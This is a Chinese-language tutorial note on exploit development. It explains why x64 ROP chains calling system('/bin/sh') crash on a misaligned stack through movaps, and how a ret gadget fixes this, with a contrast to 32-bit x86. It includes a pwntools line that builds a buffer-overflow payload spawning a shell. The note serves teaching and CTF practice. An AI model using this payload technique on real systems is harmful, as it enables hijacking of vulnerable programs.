内存对齐 (Memory Alignment) 与缓存行 (Cache Line) 机制： movaps 是一条强制要求内存对齐的指令，要求操作数的内存首地址必须是 16 的倍数（即 16 字节对齐）。现代 CPU 的 L1 数据缓存行通常为 64 字节。强制 16 字节对齐保证了这 16 字节的数据块绝对不会跨越两个不同的缓存行（Cache Line Boundary）。这使得 CPU 内部的内存控制器只需发起单次寻址操作即可完成数据读取，避免了跨缓存行读取带来的性能惩罚。

x64 ROP 链中的栈对齐

在 64 位 Linux PWN（漏洞利用）中，通过 ROP 链调用 system() 或 printf() 等标准库函数时，常会遭遇程序崩溃。其根本原因在于破坏了系统调用约定的栈对齐规范。

System V AMD64 ABI 栈对齐规范: 在执行 call 指令跳转至目标函数前，rsp % 16 == 0。call 会压入 8 字节返回地址，所以进入被调用函数第一条指令时通常是 rsp % 16 == 8。标准函数序言再执行 push rbp 后恢复到 rsp % 16 == 0。
触发 #GP 异常的根本原因： 当攻击者通过缓冲区溢出劫持控制流，并利用 ROP 链直接跳转至 system("/bin/sh") 时，往往忽略了对当前 rsp 状态的维护。如果此时 rsp 存在 8 字节的偏移错位，当执行到 Glibc 内部（如 do_system 或 vfprintf）时，由于这些高频函数在 -O3 优化级别下广泛使用 movaps 指令来操作局部变量，movaps 遇到未对齐的栈地址会直接触发硬件级别的 General Protection Fault (#GP 异常)，最终由操作系统内核向进程发送 SIGSEGV 信号导致崩溃。
Exploit 解决方案：ret Gadget 栈平衡： 在 ROP 链中，在目标函数（如 system）的地址之前，预先插入一个极简的 ret Gadget（机器码 0xC3）。ret 指令的语义等价于 pop rip，它会将栈顶的 8 字节数据弹出。这 8 字节的指针位移恰好起到了栈指针补偿的作用，将错位的 rsp 重新调整至 16 字节对齐状态，从而规避 movaps 导致的硬件异常。

Quick fix:

1 2	ret = rop.find_gadget(["ret"])[0] payload = flat(b"A" * offset, ret, pop_rdi, binsh, system)

32 位 (x86) 对齐

在 32 位漏洞利用中，因 movaps 导致的崩溃概率显著降低，其架构与编译层面的原因如下：

调用约定 (Calling Convention) 的差异： 32 位环境（如 cdecl）主要依赖栈传参，每次 push 参数会导致栈指针 esp 发生 4 字节的位移。这种高频的 4 字节扰动使得 16 字节对齐极其难以在整个调用链中维持。
编译器的指令选择策略： 鉴于 32 位下维护栈对齐的成本过高，编译器（尤其是旧版 GCC）通常会采取降级策略：默认生成容错率更高的 movups 指令（Move Unaligned，允许非对齐读取），或者直接放弃生成 SSE 向量化指令，转而使用标量指令来处理普通 C 代码。
32 位的栈平滑方案： 如果在 32 位环境下确需解决 16 字节对齐导致的崩溃，不能像 64 位那样简单粗暴地填充一个 ret 指令。攻击者需要精确计算当前 esp 距离目标对齐状态的偏移量（4 的倍数），并寻找相应数量的 pop <reg>（例如 pop eax; ret）Gadget 来进行微调，直到满足 esp % 16 == 0 的条件。